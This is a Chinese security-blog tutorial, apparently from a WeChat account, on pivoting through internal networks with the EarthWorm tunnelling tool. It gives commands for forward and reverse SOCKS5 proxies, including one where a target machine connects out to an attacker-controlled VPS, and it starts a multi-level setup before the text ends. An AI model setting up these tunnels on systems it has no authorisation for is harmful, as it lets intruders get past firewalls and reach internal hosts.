内网渗透 | 利用ew实现多级代理

  • A+
所属分类:安全文章

ew的使用

ew 全称是EarchWorm,是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有有socks5代理、端口转发和端口映射三大功能,可在复杂网络环境下完成网络穿透,且支持全平台(Windows/Linux/Mac)。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。

介绍:http://rootkiter.com/EarthWorm/


内网渗透 | 利用ew实现多级代理

模式

ew有六种模式,分别是:

  • ssocksd

  • rcsocks

  • rssocks

  • lcx_slave

  • lcx_listen

  • lcx_tran


ssocksd是用于普通网络环境下的正向连接。

rcsocks 和 rssocks 用于反向连接。

lcx_slave 、lcx_listen 和 lcx_tran 用于复杂网络环境的多级连接。

常用参数

  • -l:指定要监听的本地端口

  • -d:指定要反弹到的机器 ip

  • -e:指定要反弹到的机器端口

  • -f:指定要主动连接的机器 ip

  • -g:指定要主动连接的机器端口

  • -t:指定超时时长,默认为 1000


一级代理

正向代理

当目标机器有一个公网ip时,可以使用以下命令建立一个socks5的代理。

./ew -s ssocksd -l 1080
内网渗透 | 利用ew实现多级代理

反向代理

如果目标主机没有公网ip,则我们可以使用反向代理。在我们公网VPS(1.1.1.1)上建立一个转接隧道,将VPS 1080端口监听的流量转发到888端口。然后目标机器主动连接我们VPS的888端口。然后我们就可以通过设置代理为VPS的1080端口建立一条通往目标主机内网的socks5隧道了。

VPS:./ew -s rcsocks -l 1080 -e 888目标机器:./ew -s rssocks -d 1.1.1.1 -e 888


二级代理

现在有这么一种情况。服务器A能出网,服务器B不能出网,但是服务器B可以访问服务器C也就是靶标。服务器A不能访问到服务器C靶标,但是能通服务器B。

  • VPS:1.1.1.1

  • 服务器A(Linux):192.168.10.136

  • 服务器B(Windows):192.168.10.128

  • 靶标web系统:http://192.168.10.132

内网渗透 | 利用ew实现多级代理
内网渗透 | 利用ew实现多级代理

首先,在VPS上开启如下监听,将1080端口监听的流量都转发到本地的888端口

本文始发于微信公众号(谢公子学安全):内网渗透 | 利用ew实现多级代理

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: